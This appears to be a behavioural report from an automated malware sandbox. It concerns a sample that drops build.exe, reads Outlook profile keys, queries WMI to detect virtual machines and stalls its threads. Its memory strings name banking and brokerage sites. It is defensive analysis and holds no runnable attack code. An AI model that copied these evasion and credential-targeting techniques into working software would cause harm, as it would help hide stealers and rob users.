File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\build.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: build.exe.0.dr

Static PE information: 0xE480C158 [Mon Jun 25 20:55:52 2091 UTC]

Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCE477E push ds; iretd	2_2_00007FFAACCE477F
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCE214D push ebx; iretd	2_2_00007FFAACCE21CA
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCE00BD pushad ; iretd	2_2_00007FFAACCE00C1
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCE4BD3 pushad ; retf	2_2_00007FFAACCE4BD9

Source: file.exe

Static PE information: section name: .text entropy: 7.926984592050979

Source: build.exe.0.dr, zlj0Ou.cs	High entropy of concatenated method names: 'ToString', 'nGK', 'pv', 'no', 'e4VYI', 'iuPLV', 'x6AFVn', 'uC', 'gm', 'lN'
Source: 0.2.file.exe.3685570.1.raw.unpack, zlj0Ou.cs	High entropy of concatenated method names: 'ToString', 'nGK', 'pv', 'no', 'e4VYI', 'iuPLV', 'x6AFVn', 'uC', 'gm', 'lN'
Source: 0.2.file.exe.36bd1e8.0.raw.unpack, zlj0Ou.cs	High entropy of concatenated method names: 'ToString', 'nGK', 'pv', 'no', 'e4VYI', 'iuPLV', 'x6AFVn', 'uC', 'gm', 'lN'

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\build.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\build.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\build.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\file.exe	Memory allocated: A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 26B64FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 26B7EAC0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599544	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596155	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 595826	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 595609	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\build.exe	Window / User API: threadDelayed 2744			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Window / User API: threadDelayed 7127			Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 4892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599764s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599544s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596155s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -595826s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -595719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -595609s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\build.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599544	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596155	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 595826	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 595609	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000000.1237262342.0000026B64C32000.00000002.00000001.01000000.00000006.sdmp, build.exe.0.dr	Binary or memory string: qemu'
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
